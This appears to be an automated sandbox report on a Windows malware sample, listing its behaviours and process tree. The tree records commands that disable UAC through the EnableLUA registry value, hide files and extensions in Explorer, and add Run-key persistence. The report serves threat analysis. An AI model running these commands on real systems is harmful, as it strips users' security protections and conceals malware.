Analysis Overview
SHA256
2574e9a742b102417c4e2afe4ea95e8e8e2115b64c1bb0e8b230e127a757f6e4
Threat Level: Known bad
The file a4ac9a267d30bbd90e7305ecd29ed4e7.exe was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of file extensions in Explorer
UAC bypass
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Checks whether UAC is enabled
Drops file in System32 directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies registry key
System policy modification
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-07 19:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-07 19:21
Reported
2024-01-07 19:24
Platform
win10v2004-20231215-en
Max time kernel
0s
Max time network
150s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe | N/A |
| N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe | N/A |
| N/A | N/A | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hEIoIMIU.exe = "C:\\Users\\Admin\\EiYAQYEc\\hEIoIMIU.exe" | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | C:\ProgramData\waoYUQws\rgQoYAEU.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\rgQoYAEU.exe = "C:\\ProgramData\\waoYUQws\\rgQoYAEU.exe" | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hEIoIMIU.exe = "C:\\Users\\Admin\\EiYAQYEc\\hEIoIMIU.exe" | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\EiYAQYEc | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\EiYAQYEc\hEIoIMIU | C:\ProgramData\ZcAsYkkY\puIwwoYU.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\ProgramData\yGcIsoAM\AAQQYkEk.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\nGUIEwUY\QiUswMgw.exe |
Modifies registry key
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 4820 | N/A | N/A | C:\Users\Admin\EiYAQYEc\hEIoIMIU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
| PID 1508 wrote to memory of 1776 | N/A | N/A | C:\ProgramData\waoYUQws\rgQoYAEU.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
"C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe"
C:\ProgramData\ZcAsYkkY\puIwwoYU.exe
C:\ProgramData\ZcAsYkkY\puIwwoYU.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dIckAgYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kGYksQcY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fAQAUUIs.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vEgsgIsQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nicAccYM.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PoEoUMkw.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\nGUIEwUY\QiUswMgw.exe
"C:\Users\Admin\nGUIEwUY\QiUswMgw.exe"
C:\ProgramData\yGcIsoAM\AAQQYkEk.exe
C:\ProgramData\yGcIsoAM\AAQQYkEk.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3600 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1740 -s 372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3600 -ip 3600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5000 -ip 5000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1740 -ip 1740
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wSwsgsMA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hCYkwQQA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HCcoAwcY.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIsEAYYA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xIkMkIwQ.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUMQIcoA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yIYEwQQA.bat" "C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe""
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7.exe
C:\Users\Admin\AppData\Local\Temp\a4ac9a267d30bbd90e7305ecd29ed4e7
C:\Windows\SysWOW64\cmd.exe
